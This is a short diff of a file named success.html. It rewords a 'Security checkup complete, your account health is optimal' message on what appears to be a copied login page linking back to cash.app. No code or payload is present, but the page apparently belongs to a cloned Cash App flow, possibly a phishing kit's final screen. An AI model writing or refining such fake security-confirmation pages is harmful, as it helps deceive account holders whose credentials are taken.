--- a/success.html
+++ b/success.html
@@ -14924,8 +14924,8 @@
 				<div class="login-container flex-container flex-v-center flex-fill">
 					<div id="ember618" class="login-onboarding ember-view">
 						<!---->
-						<p class="instructions "><span>Security check complete.<br>
-Your account health is in optimal state.</span></p>
+						<p class="instructions "><span>Security checkup complete.<br>
+Your account health is optimal.</span></p>
 						<!---->
 						<div class="login-onboarding-actions"> <a class="login-onboarding-action " href="https://cash.app/">Back to Home</a> </div>
 					</div>
